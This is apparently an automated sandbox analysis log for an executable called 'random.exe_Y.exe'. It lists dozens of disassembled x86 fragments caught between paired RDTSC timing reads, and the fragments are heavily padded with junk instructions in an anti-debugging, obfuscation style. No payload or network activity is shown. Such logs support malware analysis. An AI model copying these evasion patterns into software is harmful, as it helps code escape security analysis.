                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4BD0916 second address: 4BD0962 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 retn 0004h 0x0000000b nop 0x0000000c mov esi, eax 0x0000000e lea eax, dword ptr [ebp-08h] 0x00000011 xor esi, dword ptr [00102014h] 0x00000017 push eax 0x00000018 push eax 0x00000019 push eax 0x0000001a lea eax, dword ptr [ebp-10h] 0x0000001d push eax 0x0000001e call 00007F345D267507h 0x00000023 push FFFFFFFEh 0x00000025 jmp 00007F3458756CB7h 0x0000002a pop eax 0x0000002b jmp 00007F3458756CB6h 0x00000030 ret 0x00000031 nop 0x00000032 push eax 0x00000033 call 00007F345D267531h 0x00000038 mov edi, edi 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007F3458756CAAh 0x00000043 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4BD0962 second address: 4BD0971 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3458CA514Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4BD0971 second address: 4BD0989 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3458756CB4h 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4BD0989 second address: 4BD09EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3458CA514Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov eax, 73CBF41Bh 0x00000012 mov bx, si 0x00000015 popad 0x00000016 push eax 0x00000017 pushad 0x00000018 call 00007F3458CA5153h 0x0000001d mov si, D0DFh 0x00000021 pop ecx 0x00000022 popad 0x00000023 xchg eax, ebp 0x00000024 jmp 00007F3458CA514Eh 0x00000029 mov ebp, esp 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007F3458CA5157h 0x00000032 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4BD09EA second address: 4BD09F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4BD09F0 second address: 4BD09F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4BD09F4 second address: 4BD0A3D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3458756CABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007F3458756CABh 0x00000014 pushfd 0x00000015 jmp 00007F3458756CB8h 0x0000001a sbb al, 00000038h 0x0000001d jmp 00007F3458756CABh 0x00000022 popfd 0x00000023 popad 0x00000024 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4B80019 second address: 4B8001D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4B8001D second address: 4B80023 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4B80023 second address: 4B80029 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4B80029 second address: 4B8002D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4B8002D second address: 4B80031 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4B80031 second address: 4B80082 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a call 00007F3458756CB3h 0x0000000f mov ecx, 22A982CFh 0x00000014 pop ecx 0x00000015 mov dl, FAh 0x00000017 popad 0x00000018 xchg eax, ebp 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c mov cl, bh 0x0000001e pushfd 0x0000001f jmp 00007F3458756CB2h 0x00000024 add cx, 3CA8h 0x00000029 jmp 00007F3458756CABh 0x0000002e popfd 0x0000002f popad 0x00000030 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4B80082 second address: 4B8009A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3458CA5154h 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4B8009A second address: 4B8009E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4B8009E second address: 4B800F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b mov esi, edi 0x0000000d pushfd 0x0000000e jmp 00007F3458CA5159h 0x00000013 and eax, 6C5E8A26h 0x00000019 jmp 00007F3458CA5151h 0x0000001e popfd 0x0000001f popad 0x00000020 and esp, FFFFFFF8h 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F3458CA514Dh 0x0000002a rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4B800F0 second address: 4B80100 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3458756CACh 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4B80100 second address: 4B80104 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4B80104 second address: 4B80159 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 pushad 0x0000000a push ebx 0x0000000b mov esi, 090B6C4Bh 0x00000010 pop eax 0x00000011 popad 0x00000012 mov dword ptr [esp], ecx 0x00000015 jmp 00007F3458756CB7h 0x0000001a xchg eax, ebx 0x0000001b jmp 00007F3458756CB6h 0x00000020 push eax 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 call 00007F3458756CACh 0x00000029 pop eax 0x0000002a popad 0x0000002b rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4B80159 second address: 4B80183 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3458CA514Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F3458CA5157h 0x00000011 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4B80183 second address: 4B80189 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4B80189 second address: 4B801BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3458CA514Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebx, dword ptr [ebp+10h] 0x0000000e jmp 00007F3458CA5156h 0x00000013 xchg eax, esi 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4B801BA second address: 4B801BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4B801BE second address: 4B801C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4B801C4 second address: 4B801F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F3458756CB2h 0x00000009 and eax, 24517D38h 0x0000000f jmp 00007F3458756CABh 0x00000014 popfd 0x00000015 mov ah, 57h 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b pushad 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4B802D1 second address: 4B802D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4B802D6 second address: 4B8031E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx eax, bx 0x00000006 pushfd 0x00000007 jmp 00007F3458756CB9h 0x0000000c or ax, 46C6h 0x00000011 jmp 00007F3458756CB1h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a cmp dword ptr [esi+08h], DDEEDDEEh 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 pushad 0x00000025 popad 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4B8031E second address: 4B80323 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4B80323 second address: 4B80388 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3458756CB2h 0x00000008 pushfd 0x00000009 jmp 00007F3458756CB2h 0x0000000e adc cx, C9C8h 0x00000013 jmp 00007F3458756CABh 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c je 00007F34CAF84F72h 0x00000022 jmp 00007F3458756CB6h 0x00000027 mov edx, dword ptr [esi+44h] 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d movsx edi, ax 0x00000030 mov di, cx 0x00000033 popad 0x00000034 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4B80388 second address: 4B80400 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3458CA514Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 or edx, dword ptr [ebp+0Ch] 0x0000000c jmp 00007F3458CA5156h 0x00000011 test edx, 61000000h 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007F3458CA514Dh 0x00000020 sbb esi, 7818E5A6h 0x00000026 jmp 00007F3458CA5151h 0x0000002b popfd 0x0000002c pushfd 0x0000002d jmp 00007F3458CA5150h 0x00000032 adc al, 00000048h 0x00000035 jmp 00007F3458CA514Bh 0x0000003a popfd 0x0000003b popad 0x0000003c rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4B80400 second address: 4B80406 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4B80406 second address: 4B8046C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007F34CB4D33C0h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F3458CA5158h 0x00000017 xor cx, D8D8h 0x0000001c jmp 00007F3458CA514Bh 0x00000021 popfd 0x00000022 pushfd 0x00000023 jmp 00007F3458CA5158h 0x00000028 sbb cx, A338h 0x0000002d jmp 00007F3458CA514Bh 0x00000032 popfd 0x00000033 popad 0x00000034 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4B8046C second address: 4B804C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 335Ah 0x00000007 pushfd 0x00000008 jmp 00007F3458756CABh 0x0000000d sub cx, 78FEh 0x00000012 jmp 00007F3458756CB9h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b test byte ptr [esi+48h], 00000001h 0x0000001f pushad 0x00000020 mov esi, 7151CAE3h 0x00000025 movzx esi, bx 0x00000028 popad 0x00000029 jne 00007F34CAF84E98h 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F3458756CAEh 0x00000036 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4B708BC second address: 4B708C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4B708C2 second address: 4B708C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4B708C6 second address: 4B70905 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3458CA5153h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov dh, EAh 0x00000011 pushfd 0x00000012 jmp 00007F3458CA514Ch 0x00000017 sbb ecx, 655BE308h 0x0000001d jmp 00007F3458CA514Bh 0x00000022 popfd 0x00000023 popad 0x00000024 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4B70905 second address: 4B7090B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4B7090B second address: 4B70921 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F3458CA514Ah 0x00000011 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4B70A08 second address: 4B70A27 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, ebx 0x00000005 movsx edi, cx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b sub ebx, ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F3458756CB0h 0x00000014 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4B70A27 second address: 4B70A5A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3458CA514Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b jmp 00007F3458CA5156h 0x00000010 je 00007F34CB4DAA86h 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4B70A5A second address: 4B70A5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4B70A5E second address: 4B70A64 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4B70A64 second address: 4B70AF1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3458756CB4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000010 jmp 00007F3458756CB0h 0x00000015 mov ecx, esi 0x00000017 jmp 00007F3458756CB0h 0x0000001c je 00007F34CAF8C5A4h 0x00000022 jmp 00007F3458756CB0h 0x00000027 test byte ptr [77436968h], 00000002h 0x0000002e pushad 0x0000002f pushfd 0x00000030 jmp 00007F3458756CAEh 0x00000035 adc si, 3AB8h 0x0000003a jmp 00007F3458756CABh 0x0000003f popfd 0x00000040 mov ebx, eax 0x00000042 popad 0x00000043 jne 00007F34CAF8C576h 0x00000049 pushad 0x0000004a push eax 0x0000004b push edx 0x0000004c push eax 0x0000004d push edx 0x0000004e rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4B70AF1 second address: 4B70AF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4B70AF5 second address: 4B70B5B instructions: 0x00000000 rdtsc 0x00000002 mov bh, ah 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov di, 622Ch 0x0000000a popad 0x0000000b mov edx, dword ptr [ebp+0Ch] 0x0000000e jmp 00007F3458756CABh 0x00000013 xchg eax, ebx 0x00000014 pushad 0x00000015 movzx ecx, di 0x00000018 mov di, 6CF4h 0x0000001c popad 0x0000001d push eax 0x0000001e pushad 0x0000001f mov ebx, eax 0x00000021 pushfd 0x00000022 jmp 00007F3458756CB4h 0x00000027 add si, 96A8h 0x0000002c jmp 00007F3458756CABh 0x00000031 popfd 0x00000032 popad 0x00000033 xchg eax, ebx 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007F3458756CB5h 0x0000003b rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4B70B5B second address: 4B70BEB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F3458CA5157h 0x00000009 adc ax, 894Eh 0x0000000e jmp 00007F3458CA5159h 0x00000013 popfd 0x00000014 mov edx, ecx 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, ebx 0x0000001a pushad 0x0000001b pushad 0x0000001c push esi 0x0000001d pop edi 0x0000001e mov ah, AEh 0x00000020 popad 0x00000021 call 00007F3458CA5157h 0x00000026 jmp 00007F3458CA5158h 0x0000002b pop esi 0x0000002c popad 0x0000002d push eax 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 call 00007F3458CA514Dh 0x00000036 pop esi 0x00000037 mov ebx, 3098EF34h 0x0000003c popad 0x0000003d rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4B70C2C second address: 4B70C30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4B70C30 second address: 4B70C43 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3458CA514Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4B70C43 second address: 4B70C49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4B70C49 second address: 4B70C4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4B70C4D second address: 4B70C8F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3458756CABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop esi 0x0000000c jmp 00007F3458756CB6h 0x00000011 pop ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F3458756CB7h 0x00000019 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4B70C8F second address: 4B70CE7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3458CA5159h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esp, ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F3458CA5153h 0x00000014 xor ax, A25Eh 0x00000019 jmp 00007F3458CA5159h 0x0000001e popfd 0x0000001f mov ch, 53h 0x00000021 popad 0x00000022 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4B80DBC second address: 4B80E4D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3458756CAFh 0x00000008 pushfd 0x00000009 jmp 00007F3458756CB8h 0x0000000e and esi, 18875678h 0x00000014 jmp 00007F3458756CABh 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d push eax 0x0000001e jmp 00007F3458756CB9h 0x00000023 xchg eax, ebp 0x00000024 pushad 0x00000025 mov bx, ax 0x00000028 pushfd 0x00000029 jmp 00007F3458756CB8h 0x0000002e and si, 3B38h 0x00000033 jmp 00007F3458756CABh 0x00000038 popfd 0x00000039 popad 0x0000003a mov ebp, esp 0x0000003c pushad 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4B80E4D second address: 4B80E51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4B80E51 second address: 4B80EA7 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F3458756CB0h 0x00000008 or ah, FFFFFF98h 0x0000000b jmp 00007F3458756CABh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushfd 0x00000014 jmp 00007F3458756CB8h 0x00000019 adc ch, FFFFFFF8h 0x0000001c jmp 00007F3458756CABh 0x00000021 popfd 0x00000022 popad 0x00000023 pop ebp 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 mov esi, ebx 0x00000029 mov eax, edx 0x0000002b popad 0x0000002c rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4B80B2F second address: 4B80B33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4B80B33 second address: 4B80B4E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3458756CB7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4B80B4E second address: 4B80B53 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4B80B53 second address: 4B80B86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ebx, 316AC618h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007F3458756CAEh 0x00000012 xchg eax, ebp 0x00000013 pushad 0x00000014 mov ebx, eax 0x00000016 mov cx, 8A19h 0x0000001a popad 0x0000001b mov ebp, esp 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F3458756CABh 0x00000024 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4B80B86 second address: 4B80BAD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop ecx 0x00000005 movsx edx, ax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F3458CA5159h 0x00000013 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4C007AE second address: 4C007BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 xchg eax, ebp 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4C007BB second address: 4C007BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4C007BF second address: 4C007C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4C007C5 second address: 4C007CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4C007CB second address: 4C007CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4C007CF second address: 4C007D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4C007D3 second address: 4C00800 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F3458756CAFh 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F3458756CB0h 0x00000018 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4C00800 second address: 4C00804 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4C00804 second address: 4C0080A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4C0080A second address: 4C0080F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4C0080F second address: 4C00830 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3458756CAAh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov ebp, esp 0x0000000e pushad 0x0000000f mov dx, si 0x00000012 mov dh, ch 0x00000014 popad 0x00000015 pop ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4C00830 second address: 4C00834 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
